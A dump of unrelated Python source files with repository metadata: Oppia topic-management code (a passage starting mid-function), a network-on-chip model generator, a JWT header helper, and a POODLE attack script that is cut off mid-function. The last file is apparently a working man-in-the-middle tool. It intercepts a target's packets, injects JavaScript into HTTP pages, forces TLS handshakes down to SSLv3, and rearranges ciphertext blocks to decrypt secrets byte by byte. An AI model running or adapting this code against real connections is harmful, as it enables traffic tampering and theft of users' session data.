if role_services.ACTION_CHANGE_STORY_STATUS not in user.actions:
raise Exception(
'The user does not have enough rights to unpublish the story.')
    topic = topic_fetchers.get_topic_by_id(topic_id, strict=False)
if topic is None:
raise Exception('A topic with the given ID doesn\'t exist')
story = story_fetchers.get_story_by_id(story_id, strict=False)
if story is None:
raise Exception('A story with the given ID doesn\'t exist')
topic.unpublish_story(story_id)
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_UNPUBLISH_STORY,
'story_id': story_id
})]
_save_topic(
committer_id, topic, 'Unpublished story with id %s' % story_id,
change_list)
generate_topic_summary(topic.id)
# Delete corresponding exploration opportunities and reject associated
# translation suggestions.
exp_ids = story.story_contents.get_all_linked_exp_ids()
opportunity_services.delete_exploration_opportunities(exp_ids)
suggestion_services.auto_reject_translation_suggestions_for_exp_ids(exp_ids)
def delete_canonical_story(user_id, topic_id, story_id):
"""Removes story with given id from the topic.
NOTE TO DEVELOPERS: Presently, this function only removes story_reference
from canonical_story_references list.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic from which to remove the story.
story_id: str. The story to remove from the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_DELETE_CANONICAL_STORY,
'story_id': story_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Removed %s from canonical story ids' % story_id)
def add_canonical_story(user_id, topic_id, story_id):
"""Adds a story to the canonical story reference list of a topic.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic to which the story is to be added.
story_id: str. The story to add to the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_ADD_CANONICAL_STORY,
'story_id': story_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Added %s to canonical story ids' % story_id)
def delete_additional_story(user_id, topic_id, story_id):
"""Removes story with given id from the topic.
NOTE TO DEVELOPERS: Presently, this function only removes story_reference
from additional_story_references list.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic from which to remove the story.
story_id: str. The story to remove from the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_DELETE_ADDITIONAL_STORY,
'story_id': story_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Removed %s from additional story ids' % story_id)
def add_additional_story(user_id, topic_id, story_id):
"""Adds a story to the additional story reference list of a topic.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic to which the story is to be added.
story_id: str. The story to add to the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_ADD_ADDITIONAL_STORY,
'story_id': story_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Added %s to additional story ids' % story_id)
def delete_topic(committer_id, topic_id, force_deletion=False):
"""Deletes the topic with the given topic_id.
Args:
committer_id: str. ID of the committer.
topic_id: str. ID of the topic to be deleted.
force_deletion: bool. If true, the topic and its history are fully
deleted and are unrecoverable. Otherwise, the topic and all
its history are marked as deleted, but the corresponding models are
still retained in the datastore. This last option is the preferred
one.
Raises:
ValueError. User does not have enough rights to delete a topic.
"""
topic_rights_model = topic_models.TopicRightsModel.get(topic_id)
topic_rights_model.delete(
committer_id, feconf.COMMIT_MESSAGE_TOPIC_DELETED,
force_deletion=force_deletion)
# Delete the summary of the topic (regardless of whether
# force_deletion is True or not).
delete_topic_summary(topic_id)
topic_model = topic_models.TopicModel.get(topic_id)
for subtopic in topic_model.subtopics:
subtopic_page_services.delete_subtopic_page(
committer_id, topic_id, subtopic['id'])
all_story_references = (
topic_model.canonical_story_references +
topic_model.additional_story_references)
for story_reference in all_story_references:
story_services.delete_story(
committer_id, story_reference['story_id'],
force_deletion=force_deletion)
topic_model.delete(
committer_id, feconf.COMMIT_MESSAGE_TOPIC_DELETED,
force_deletion=force_deletion)
feedback_services.delete_threads_for_multiple_entities(
feconf.ENTITY_TYPE_TOPIC, [topic_id])
# This must come after the topic is retrieved. Otherwise the memcache
# key will be reinstated.
caching_services.delete_multi(
caching_services.CACHE_NAMESPACE_TOPIC, None, [topic_id])
(
opportunity_services
.delete_exploration_opportunities_corresponding_to_topic(topic_id))
def delete_topic_summary(topic_id):
"""Delete a topic summary model.
Args:
topic_id: str. ID of the topic whose topic summary is to
be deleted.
"""
topic_models.TopicSummaryModel.get(topic_id).delete()
def generate_topic_summary(topic_id):
"""Creates and stores a summary of the given topic.
Args:
topic_id: str. ID of the topic.
"""
topic = topic_fetchers.get_topic_by_id(topic_id)
topic_summary = compute_summary_of_topic(topic)
save_topic_summary(topic_summary)
def compute_summary_of_topic(topic):
"""Create a TopicSummary domain object for a given Topic domain
object and return it.
Args:
topic: Topic. The topic object for which the summary is to be computed.
Returns:
TopicSummary. The computed summary for the given topic.
"""
canonical_story_count = 0
additional_story_count = 0
for reference in topic.canonical_story_references:
if reference.story_is_published:
canonical_story_count += 1
for reference in topic.additional_story_references:
if reference.story_is_published:
additional_story_count += 1
topic_model_canonical_story_count = canonical_story_count
topic_model_additional_story_count = additional_story_count
topic_model_uncategorized_skill_count = len(topic.uncategorized_skill_ids)
topic_model_subtopic_count = len(topic.subtopics)
total_skill_count = topic_model_uncategorized_skill_count
for subtopic in topic.subtopics:
total_skill_count = total_skill_count + len(subtopic.skill_ids)
topic_summary = topic_domain.TopicSummary(
topic.id, topic.name, topic.canonical_name, topic.language_code,
topic.description, topic.version, topic_model_canonical_story_count,
topic_model_additional_story_count,
topic_model_uncategorized_skill_count, topic_model_subtopic_count,
total_skill_count, topic.thumbnail_filename, topic.thumbnail_bg_color,
topic.url_fragment, topic.created_on, topic.last_updated
)
return topic_summary
def save_topic_summary(topic_summary):
"""Save a topic summary domain object as a TopicSummaryModel
entity in the datastore.
Args:
topic_summary: TopicSummaryModel. The topic summary object to be saved
in the datastore.
"""
topic_summary_dict = {
'name': topic_summary.name,
'description': topic_summary.description,
'canonical_name': topic_summary.canonical_name,
'language_code': topic_summary.language_code,
'version': topic_summary.version,
'additional_story_count': topic_summary.additional_story_count,
'canonical_story_count': topic_summary.canonical_story_count,
'uncategorized_skill_count': topic_summary.uncategorized_skill_count,
'subtopic_count': topic_summary.subtopic_count,
'total_skill_count': topic_summary.total_skill_count,
'thumbnail_filename': topic_summary.thumbnail_filename,
'thumbnail_bg_color': topic_summary.thumbnail_bg_color,
'topic_model_last_updated': topic_summary.topic_model_last_updated,
'topic_model_created_on': topic_summary.topic_model_created_on,
'url_fragment': topic_summary.url_fragment
}
topic_summary_model = (
topic_models.TopicSummaryModel.get_by_id(topic_summary.id))
if topic_summary_model is not None:
topic_summary_model.populate(**topic_summary_dict)
topic_summary_model.update_timestamps()
topic_summary_model.put()
else:
topic_summary_dict['id'] = topic_summary.id
model = topic_models.TopicSummaryModel(**topic_summary_dict)
model.update_timestamps()
model.put()
def publish_topic(topic_id, committer_id):
"""Marks the given topic as published.
Args:
topic_id: str. The id of the given topic.
committer_id: str. ID of the committer.
Raises:
Exception. The given topic does not exist.
Exception. The topic is already published.
Exception. The user does not have enough rights to publish the topic.
"""
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None:
raise Exception('The given topic does not exist')
topic = topic_fetchers.get_topic_by_id(topic_id)
topic.validate(strict=True)
user = user_services.UserActionsInfo(committer_id)
if role_services.ACTION_CHANGE_TOPIC_STATUS not in user.actions:
raise Exception(
'The user does not have enough rights to publish the topic.')
if topic_rights.topic_is_published:
raise Exception('The topic is already published.')
topic_rights.topic_is_published = True
commit_cmds = [topic_domain.TopicRightsChange({
'cmd': topic_domain.CMD_PUBLISH_TOPIC
})]
save_topic_rights(
topic_rights, committer_id, 'Published the topic', commit_cmds)
opportunity_services.create_exploration_opportunities_for_topic(topic.id)
def unpublish_topic(topic_id, committer_id):
"""Marks the given topic as unpublished.
Args:
topic_id: str. The id of the given topic.
committer_id: str. ID of the committer.
Raises:
Exception. The given topic does not exist.
Exception. The topic is already unpublished.
Exception. The user does not have enough rights to unpublish the topic.
"""
topic_rights = topic_fetchers.get_topic_rights(topic_id, strict=False)
if topic_rights is None:
raise Exception('The given topic does not exist')
user = user_services.UserActionsInfo(committer_id)
if role_services.ACTION_CHANGE_TOPIC_STATUS not in user.actions:
raise Exception(
'The user does not have enough rights to unpublish the topic.')
if not topic_rights.topic_is_published:
raise Exception('The topic is already unpublished.')
topic_rights.topic_is_published = False
commit_cmds = [topic_domain.TopicRightsChange({
'cmd': topic_domain.CMD_UNPUBLISH_TOPIC
})]
save_topic_rights(
topic_rights, committer_id, 'Unpublished the topic', commit_cmds)
# Delete the exploration opportunities associated with the topic and reject
# the corresponding translation suggestions.
exp_ids = (
opportunity_services
.get_exploration_opportunity_ids_corresponding_to_topic(topic_id)
)
opportunity_services.delete_exploration_opportunities(exp_ids)
suggestion_services.auto_reject_translation_suggestions_for_exp_ids(exp_ids)
def save_topic_rights(topic_rights, committer_id, commit_message, commit_cmds):
"""Saves a TopicRights domain object to the datastore.
Args:
topic_rights: TopicRights. The rights object for the given
topic.
committer_id: str. ID of the committer.
commit_message: str. Descriptive message for the commit.
commit_cmds: list(TopicRightsChange). A list of commands describing
what kind of commit was done.
"""
model = topic_models.TopicRightsModel.get(topic_rights.id, strict=False)
model.manager_ids = topic_rights.manager_ids
model.topic_is_published = topic_rights.topic_is_published
commit_cmd_dicts = [commit_cmd.to_dict() for commit_cmd in commit_cmds]
model.commit(committer_id, commit_message, commit_cmd_dicts)
def create_new_topic_rights(topic_id, committer_id):
"""Creates a new topic rights object and saves it to the datastore.
Args:
topic_id: str. ID of the topic.
committer_id: str. ID of the committer.
"""
topic_rights = topic_domain.TopicRights(topic_id, [], False)
commit_cmds = [{'cmd': topic_domain.CMD_CREATE_NEW}]
topic_models.TopicRightsModel(
id=topic_rights.id,
manager_ids=topic_rights.manager_ids,
topic_is_published=topic_rights.topic_is_published
).commit(committer_id, 'Created new topic rights', commit_cmds)
def get_multi_topic_rights(topic_ids):
"""Returns the rights of all topics whose topic ids are passed in.
Args:
topic_ids: list(str). The IDs of topics for which rights are to be
returned.
Returns:
list(TopicRights). The list of rights of all given topics present in
the datastore.
"""
topic_rights_models = topic_models.TopicRightsModel.get_multi(topic_ids)
topic_rights = [
topic_fetchers.get_topic_rights_from_model(rights) if rights else None
for rights in topic_rights_models]
return topic_rights
def get_topic_rights_with_user(user_id):
"""Retrieves the rights object for all topics assigned to given user.
Args:
user_id: str. ID of the user.
Returns:
list(TopicRights). The rights objects associated with the topics
assigned to given user.
"""
topic_rights_models = topic_models.TopicRightsModel.get_by_user(user_id)
return [
topic_fetchers.get_topic_rights_from_model(model)
for model in topic_rights_models
if model is not None]
def get_all_topic_rights():
"""Returns the rights object of all topics present in the datastore.
Returns:
dict. The dict of rights objects of all topics present in the datastore
keyed by topic id.
"""
topic_rights_models = topic_models.TopicRightsModel.get_all()
topic_rights = {}
for model in topic_rights_models:
rights = topic_fetchers.get_topic_rights_from_model(model)
topic_rights[rights.id] = rights
return topic_rights
def filter_published_topic_ids(topic_ids):
"""Given list of topic IDs, returns the IDs of all topics that are published
in that list.
Args:
topic_ids: list(str). The list of topic ids.
Returns:
list(str). The topic IDs in the passed in list corresponding to
published topics.
"""
topic_rights_models = topic_models.TopicRightsModel.get_multi(topic_ids)
published_topic_ids = []
for ind, model in enumerate(topic_rights_models):
if model is None:
continue
rights = topic_fetchers.get_topic_rights_from_model(model)
if rights.topic_is_published:
published_topic_ids.append(topic_ids[ind])
return published_topic_ids
def check_can_edit_topic(user, topic_rights):
"""Checks whether the user can edit the given topic.
Args:
user: UserActionsInfo. Object having user_id, role and actions for
given user.
topic_rights: TopicRights or None. Rights object for the given topic.
Returns:
bool. Whether the given user can edit the given topic.
"""
if topic_rights is None:
return False
if role_services.ACTION_EDIT_ANY_TOPIC in user.actions:
return True
if role_services.ACTION_EDIT_OWNED_TOPIC not in user.actions:
return False
if topic_rights.is_manager(user.user_id):
return True
return False
def deassign_user_from_all_topics(committer, user_id):
"""Deassigns given user from all topics assigned to them.
Args:
committer: UserActionsInfo. UserActionsInfo object for the user
who is performing the action.
user_id: str. The ID of the user.
Raises:
Exception. The committer does not have rights to modify a role.
"""
topic_rights_list = get_topic_rights_with_user(user_id)
for topic_rights in topic_rights_list:
topic_rights.manager_ids.remove(user_id)
commit_cmds = [topic_domain.TopicRightsChange({
'cmd': topic_domain.CMD_REMOVE_MANAGER_ROLE,
'removed_user_id': user_id
})]
save_topic_rights(
topic_rights, committer.user_id,
'Removed all assigned topics from %s' % (user_id), commit_cmds)
def assign_role(committer, assignee, new_role, topic_id):
"""Assigns a new role to the user.
Args:
committer: UserActionsInfo. UserActionsInfo object for the user
who is performing the action.
assignee: UserActionsInfo. UserActionsInfo object for the user
whose role is being changed.
        new_role: str. The name of the new role. Possible values are:
            ROLE_MANAGER, ROLE_NONE.
topic_id: str. ID of the topic.
Raises:
Exception. The committer does not have rights to modify a role.
Exception. The assignee is already a manager for the topic.
Exception. The assignee doesn't have enough rights to become a manager.
Exception. The role is invalid.
"""
committer_id = committer.user_id
topic_rights = topic_fetchers.get_topic_rights(topic_id)
if (role_services.ACTION_MODIFY_ROLES_FOR_ANY_ACTIVITY not in
committer.actions):
logging.error(
'User %s tried to allow user %s to be a %s of topic %s '
'but was refused permission.' % (
committer_id, assignee.user_id, new_role, topic_id))
raise Exception(
'UnauthorizedUserException: Could not assign new role.')
assignee_username = user_services.get_username(assignee.user_id)
if role_services.ACTION_EDIT_OWNED_TOPIC not in assignee.actions:
raise Exception(
'The assignee doesn\'t have enough rights to become a manager.')
old_role = topic_domain.ROLE_NONE
if topic_rights.is_manager(assignee.user_id):
old_role = topic_domain.ROLE_MANAGER
if new_role == topic_domain.ROLE_MANAGER:
if topic_rights.is_manager(assignee.user_id):
raise Exception('This user already is a manager for this topic')
topic_rights.manager_ids.append(assignee.user_id)
elif new_role == topic_domain.ROLE_NONE:
if topic_rights.is_manager(assignee.user_id):
topic_rights.manager_ids.remove(assignee.user_id)
else:
old_role = topic_domain.ROLE_NONE
else:
raise Exception('Invalid role: %s' % new_role)
commit_message = rights_domain.ASSIGN_ROLE_COMMIT_MESSAGE_TEMPLATE % (
assignee_username, old_role, new_role)
commit_cmds = [topic_domain.TopicRightsChange({
'cmd': topic_domain.CMD_CHANGE_ROLE,
'assignee_id': assignee.user_id,
'old_role': old_role,
'new_role': new_role
})]
save_topic_rights(topic_rights, committer_id, commit_message, commit_cmds)
| avg_line_length: 40.411576 | max_line_length: 115 | alphanum_fraction: 0.689171 |
| hexsha: 3ff6a1c172d4ec84797f17aed4acfbb134efb439 | size: 4,459 | ext: py | lang: Python | path: scripts/3D-VSoC-small/generate_model.py | repo: Joern-Noeller/ratatoskr | repo_head_hexsha: 4b60e9c880b7b647ce4ddc76f368452d85cdf5fe | licenses: ["MIT"] | stars: 10 (2019-09-05T01:35:53.000Z to 2022-02-22T09:14:03.000Z) | issues: 68 (2018-02-05T18:02:38.000Z to 2021-03-02T15:34:50.000Z) | forks: 22 (2018-10-31T01:43:46.000Z to 2022-02-22T09:14:07.000Z) |
from xml_writers import DataWriter, MapWriter
import math
###############################################################################
""" Data Size Per Step """
stp1_data_sz = 13161
stp2_data_sz = 3716
stp3_data_sz = 929
stp4_data_sz = 1
interval = 100
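# Worked values for the math.ceil() expressions used below (illustrative note,
# not part of the original script): math.ceil(stp4_data_sz / 4) evaluates to
# math.ceil(1 / 4) = 1, and math.ceil(stp1_data_sz / 2) evaluates to
# math.ceil(13161 / 2) = 6581.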
###############################################################################
""" Create data.xml """
data_writer = DataWriter('data')
data_writer.add_dataTypes_node(['dt_0', 'dt_1', 'dt_2', 'dt_3'])
tasks_node = data_writer.add_tasks_node()
""" Bottom Layer """
for t_id in range(12):
task_node = data_writer.add_task_node(tasks_node, t_id)
requires_node = data_writer.add_requires_node(task_node)
if t_id in range(8, 12):
data_writer.add_requirement(requires_node, 0, 3, 32, stp4_data_sz)
elif t_id in range(4, 8):
data_writer.add_requirement(requires_node, 0, 3, 28, stp4_data_sz)
elif t_id in range(0, 4):
data_writer.add_requirement(requires_node, 0, 3, 24, stp4_data_sz)
""" Middle Layer """
for t_id in [12, 13, 16, 17, 20, 21]:
task_node = data_writer.add_task_node(tasks_node, t_id)
requires_node = data_writer.add_requires_node(task_node)
if t_id in [12, 16, 20]:
data_writer.add_requirement(requires_node, 0, 0, t_id + 13,
stp1_data_sz)
#data_writer.add_requirement(requires_node, 1, 0, t_id + 14,
# math.ceil(stp1_data_sz/2))
if t_id in [13, 17, 21]:
data_writer.add_requirement(requires_node, 0, 0, t_id + 14,
stp1_data_sz)
#data_writer.add_requirement(requires_node, 1, 0, t_id + 13,
# math.ceil(stp1_data_sz/2))
generates_node = data_writer.add_generates_node(task_node)
data_writer.add_possibility(generates_node, 0, 1, [0, 100], interval,
stp2_data_sz, 1, [t_id + 2])
for t_id in [14, 15, 18, 19, 22, 23]:
task_node = data_writer.add_task_node(tasks_node, t_id)
requires_node = data_writer.add_requires_node(task_node)
data_writer.add_requirement(requires_node, 0, 1, t_id - 2, stp2_data_sz)
generates_node = data_writer.add_generates_node(task_node)
if t_id in [14, 15]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp3_data_sz, 2, [24])
elif t_id in [18, 19]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp3_data_sz, 2, [28])
elif t_id in [22, 23]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp3_data_sz, 2, [32])
""" Top Layer """
for t_id in [24, 28, 32]:
task_node = data_writer.add_task_node(tasks_node, t_id)
requires_node = data_writer.add_requires_node(task_node)
data_writer.add_requirement(requires_node, 0, 2, t_id - 10, stp3_data_sz)
#data_writer.add_requirement(requires_node, 1, 2, t_id - 9, stp3_data_sz)
generates_node = data_writer.add_generates_node(task_node)
data_writer.add_possibility(generates_node, 0, 1, [0, 100], interval,
math.ceil(stp4_data_sz/4), 3, [t_id - 24,
t_id - 23, t_id - 22, t_id - 21])
for t_id in [25, 26, 27, 29, 30, 31, 33, 34, 35]:
task_node = data_writer.add_task_node(tasks_node, t_id)
generates_node = data_writer.add_generates_node(task_node)
if t_id in [25, 29, 33]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp1_data_sz, 0, [t_id - 13])
elif t_id in [26, 30, 34]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, math.ceil(stp1_data_sz/2),
0, [t_id - 13, t_id - 14])
elif t_id in [27, 31, 35]:
data_writer.add_possibility(generates_node, 0, 1, [0, 100],
interval, stp1_data_sz, 0, [t_id - 14])
data_writer.write_file('data.xml')
###############################################################################
""" Create map.xml """
map_writer = MapWriter('map')
map_writer.add_bindings(list(range(0, 36)),
list(range(0, 12)) +
list(range(20, 32)) +
list(range(36, 48)))
map_writer.write_file('map.xml')
| avg_line_length: 46.447917 | max_line_length: 79 | alphanum_fraction: 0.573895 |
| hexsha: 417cb84b18bfa215758e043bf94cc2d0d861a92e | size: 609 | ext: py | lang: Python | path: sdc/crypto/helper.py | repo: JamesGardiner/sdc-cryptography | repo_head_hexsha: e8e50595eefef7ed0bdf1b97abee98e60e9e6a10 | licenses: ["MIT"] | stars: 3 (2017-10-05T12:38:15.000Z to 2019-07-05T11:01:21.000Z) | issues: 29 (2017-07-26T10:43:47.000Z to 2021-04-30T12:53:42.000Z) | forks: 3 (2021-04-11T07:54:38.000Z to 2021-04-29T13:46:30.000Z) |
import json
from jwcrypto.common import base64url_decode
from sdc.crypto.exceptions import InvalidTokenException
def extract_kid_from_header(token):
header = token.split('.')[:1][0]
if not header:
raise InvalidTokenException("Missing Headers")
try:
protected_header = base64url_decode(header).decode()
protected_header_data = json.loads(protected_header)
        if 'kid' in protected_header_data:
return protected_header_data['kid']
except ValueError:
raise InvalidTokenException("Invalid Header")
raise InvalidTokenException("Missing kid")
| avg_line_length: 25.375 | max_line_length: 60 | alphanum_fraction: 0.71757 |
| hexsha: b0f157af77ed7ba0eeb0e8530cda159cfecda315 | size: 14,838 | ext: py | lang: Python | path: intercept.py | repo: SteffeyDev/poodle | repo_head_hexsha: 0edf50e0c93def560acc89a41d524da52de1690e | licenses: ["MIT"] | stars: 8 (2018-11-14T17:29:10.000Z to 2020-10-20T17:11:19.000Z) | issues: 1 (2020-09-06T05:47:52.000Z to 2020-09-07T00:26:22.000Z) | forks: 5 (2019-02-28T13:15:59.000Z to 2020-10-20T17:11:27.000Z) |
#!/usr/bin/env python3
from netfilterqueue import NetfilterQueue
from scapy.all import *
from scapy_http.http import *
import json
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import threading
import time
from reprint import output
import os
DEBUG = False
# Track sessions using src_port as key
sessions = {}
class Session:
def __init__(self, src_port):
self.downgrade_needed = True
self.src_port = src_port
self.ciphertext = None
self.last_seq = None
self.block = None
# Need to get the server IP from DNS response
server_ip = None
server_ip = '108.188.248.132' # temp
# For block_size stage
ciphertext_length = 0
data_padding_size_needed = 0
block_size = None
# For exploit stage
block_to_move = 1
current_offset = 0
secret = {}
count = 0
number_of_requests = {}
dns_mapping = {}
request_length_count = {}
option_request_length = None
post_request_length = None
option_response_length = None
skip_first_response = True
load_layer('tls')
config = json.load(open('config.json'))
log_file = open('intercept.log', 'w')
# Load the variables into the JavaScript agent that will be run on the target
js_client_html = open('poodle.js', 'r').read()
js_client_html = js_client_html.replace('attackerIp', '"' + config['attacker'] + '"').replace('targetUrl', '"https://' + config['server'] + '"').replace('\n', '').replace('\r', '').replace('\t', '')
def get_field(layer, field_name):
return layer.get_field(field_name).i2repr(layer, getattr(layer, field_name))
def copy_block_to_end(arr, copy_index):
return arr[:-block_size] + arr[copy_index:(copy_index+block_size)]
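# Illustrative sketch (not part of the original script): with the global
# block_size set to 8, copy_block_to_end(b'AAAAAAAABBBBBBBBCCCCCCCC', 8) drops
# the final block b'CCCCCCCC' and appends a copy of the block starting at
# index 8, yielding b'AAAAAAAABBBBBBBBBBBBBBBB'.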
def modify_and_send_packet(packet, pkt):
del pkt[IP].chksum
del pkt[TCP].chksum
pkt[IP].len = len(pkt)
packet.set_payload(bytes(pkt))
packet.accept()
def log(text):
if DEBUG:
print(text)
log_file.write(text + '\n')
with output(output_type='list', initial_len=6) as output_list:
output_list[0] = 'Waiting for agent...'
def get_current_index():
if block_size:
return ((block_to_move + 1) * block_size) - current_offset
return 0
def print_state(ciphertext_length = None, math_str = None):
if not DEBUG:
update_state_progress()
output_list[2] = "Last Byte Decrypted: {}".format(math_str) if math_str is not None else ''
plaintext = repr(''.join([ chr(secret[i]) if i in secret else '.' for i in range(ciphertext_length) ])) if ciphertext_length is not None else '......'
output_list[3] = "Decrypted Plaintext: {}".format(plaintext)
percent_complete = len(secret) / ciphertext_length if ciphertext_length is not None else 0
segment = int(percent_complete * 50)
progress_bar = ("#" * segment) + (" " * (50-segment))
output_list[4] = "Progress: [{}] {}%".format(progress_bar, int(percent_complete*100))
if len(number_of_requests) > 0:
output_list[5] = "Average number of requests: {}".format(sum(number_of_requests.values()) / len(number_of_requests))
else:
output_list[5] = "Average number of requests: N/A"
def update_state_progress():
if not DEBUG and block_size is not None and post_request_length is not None:
output_list[0] = "Block Size: {}, POST Request length: {}".format(block_size, post_request_length) + (", OPTION Request length: {}".format(option_request_length) if option_request_length is not None else "")
current_index = get_current_index()
try:
output_list[1] = "Working on decrypting byte {} - Request #{}".format(current_index, number_of_requests[current_index])
except:
pass
def callback(packet):
global block_size
global block_to_move
global ciphertext_length
global data_padding_size_needed
global sessions
global option_request_length
global post_request_length
global option_response_length
global skip_first_response
global current_offset
global dns_mapping
global server_ip
global number_of_requests
global request_length_count
pkt = IP(packet.get_payload())
        # JavaScript HTTP injection not quite working
# TODO: Fix
if HTTP in pkt and config['injectJS']:
# On outgoing HTTP requests, make sure there is no compression or caching
if pkt.src == config['target']:
log("Sending request to " + pkt.dst)
raw_http = pkt['HTTP']['Raw'].load.decode('utf8')
if 'GET' in raw_http and len(raw_http) > 0:
encoding_pattern = 'Accept-Encoding: ([a-z-,]+)'
encoding_match = re.search(encoding_pattern, raw_http)
if encoding_match is not None:
raw_http = raw_http.replace(encoding_match.group(), 'Accept-Encoding: identity')
else:
index = raw_http.find('\r\n\r\n')
if index > 0:
                            raw_http = raw_http[:index] + '\r\nAccept-Encoding: identity' + raw_http[index:]
cache_pattern = 'Cache-Control: ([a-z-=0-9]+)'
cache_match = re.search(cache_pattern, raw_http)
if cache_match is not None:
raw_http = raw_http.replace(cache_match.group(), 'Cache-Control: no-cache')
else:
index = raw_http.find('\r\n\r\n')
if index > 0:
                            raw_http = raw_http[:index] + '\r\nCache-Control: no-cache' + raw_http[index:]
#pkt[HTTP][Raw].load = bytes(raw_http, 'utf8')
log("Sent: " + str(raw_http))
modify_and_send_packet(packet, pkt)
return
#pkt.getlayer(HTTP).getlayer(Raw).load = bytes(str(pkt.getlayer(HTTP).getlayer(Raw).load).replace('Accept-Encoding: gzip', 'Accept-Encoding: identity').replace('Cache-Control' + str(pkt['HTTP']['HTTP Request'].fields['Cache-Control']), 'Cache-Control: no-cache'))
# pkt.getlayer(HTTP).show()
#str_headers = str(pkt['HTTP']['HTTP Request'].fields['Headers'])
#pkt['HTTP']['HTTP Request'].fields['Accept-Encoding'] = 'identity'
#pkt['HTTP']['HTTP Request'].fields['Cache-Control'] = 'no-cache'
#str_headers = str_headers.replace('Accept-Encoding: ' + str(pkt['HTTP']['HTTP Request'].fields['Accept-Encoding']), 'Accept-Encoding: identity').replace('Cache-Control' + str(pkt['HTTP']['HTTP Request'].fields['Cache-Control']), 'Cache-Control: no-cache')
#pkt['HTTP']['HTTP Request'].fields['Headers'] = str_headers
# On return packets, inject the JS client
elif pkt.dst == config['target'] and HTTP in pkt:
raw_http = pkt[HTTP][Raw].load.decode('utf8').replace('\\r\\n', '')
index = raw_http.find('</body>')
if index > 0:
raw_http = bytes(raw_http[:index] + js_client_html + raw_http[index:], 'utf8')
#pkt[HTTP][Raw].load = raw_http
modify_and_send_packet(packet, pkt)
else:
packet.accept()
return
if pkt.src == config['target'] and pkt.dst == server_ip and pkt.haslayer(TLS):
log("TLS Type: {}".format(get_field(pkt.getlayer(TLS), 'type')))
# TLS Downgrade
if TLS in pkt and get_field(pkt['TLS'], 'version') != 'SSLv3':
# Change the client handshake to offer SSLv3
if get_field(pkt.getlayer(TLS), 'type') == "handshake":
# 0x0300 is SSLv3
pkt[TLS].version = 0x0300
pkt[TLS]['TLS Handshake - Client Hello'].version = 0x0300
# Otherwise, if we are sending data over TLS, just end the connection
else:
pkt[TCP].flags = 'FA'
pkt[TCP].len = 0
pkt[TCP].remove_payload()
modify_and_send_packet(packet, pkt)
return
src_port = pkt['TCP'].sport
session = sessions[src_port] if src_port in sessions else Session(src_port)
# Modify retransmissions
if session.ciphertext is not None and bytes(pkt)[-block_size:] == session.ciphertext[-block_size:]:
new_bytes = bytes(pkt)[:-block_size] + session.block
modify_and_send_packet(packet, IP(new_bytes))
return
sessions[src_port] = session
if TLS in pkt and get_field(pkt.getlayer(TLS), 'type') == "application_data":
# Need to make sure that the packets are sent by our JS agent, and one thing our JS agent does is send the same packets over and over...
request_length_count[len(pkt)] = request_length_count[len(pkt)] + 1 if len(pkt) in request_length_count else 1
if request_length_count[len(pkt)] < 5:
packet.accept()
return
# Don't modify pre-flight check
if config["skipOptions"] and (option_request_length is None or (post_request_length is not None and len(pkt) < post_request_length)):
log("Skipping OPTION Request")
if option_request_length is None:
log("OPTION Request Length: " + str(len(pkt)))
option_request_length = len(pkt)
packet.accept()
return
elif post_request_length is None:
log("POST Request Length: " + str(len(pkt)))
post_request_length = len(pkt)
# Stage 1: The JS client is sending packets of increasing length
if block_size is None:
log("Got request length " + str(len(pkt)))
if ciphertext_length > 0:
if len(pkt) > ciphertext_length:
block_size = len(pkt) - ciphertext_length
print_state(ciphertext_length)
log("Found block size: " + str(block_size))
# Get amount of padding needed by looking back and seeing how many requests were made before the first jump in request size
current_len = len(pkt)
while (current_len - block_size) in request_length_count:
current_len -= block_size
data_padding_size_needed = request_length_count[current_len]
log("Found padding length: " + str(data_padding_size_needed))
else:
ciphertext_length = len(pkt)
# Stage 2: The JS client is sending the same packet repeatedly and waiting for us to decrypt it
else:
if len(pkt) > post_request_length:
log("New POST Request Length: " + str(len(pkt)))
post_request_length = len(pkt)
if get_current_index() in number_of_requests:
number_of_requests[get_current_index()] += 1
update_state_progress()
log("Copying block to end")
start_index = block_size * block_to_move
tls_data_start_index = ([i + 5 for i in range(len(bytes(pkt))) if list(bytes(pkt))[i:i+3] == [0x17, 0x03, 0x00]])[-1]
session.ciphertext = bytes(pkt)[tls_data_start_index:]
log("tls_data_start_index: " + str(tls_data_start_index))
log("start_index: " + str(start_index))
new_bytes = copy_block_to_end(bytes(pkt), tls_data_start_index + start_index)
session.block = new_bytes[-block_size:]
modify_and_send_packet(packet, IP(new_bytes))
return
elif pkt.src == server_ip and pkt.dst == config['target'] and 'TLS' in pkt and block_size is not None:
# If we get success (data instead of alert), do math to get byte
if get_field(pkt.getlayer(TLS), 'type') == "application_data" and pkt['TCP'].dport in sessions:
# The first response that ends up here will be the response to the last block length query, so need to ignore it
if skip_first_response:
skip_first_response = False
packet.accept()
return
# Ignore response to pre-flight check
if config["skipOptions"] and (option_response_length is None or len(pkt) == option_response_length):
log("Skipping OPTION Response")
if option_response_length is None:
log("OPTION Response length: " + str(len(pkt)))
option_response_length = len(pkt)
packet.accept()
return
session = sessions[pkt['TCP'].dport]
ciphertext = session.ciphertext
del sessions[pkt[TCP].dport]
if ciphertext is not None:
previous_block_last_byte = ciphertext[((block_to_move) * block_size) - 1]
last_block_last_byte = ciphertext[-block_size - 1]
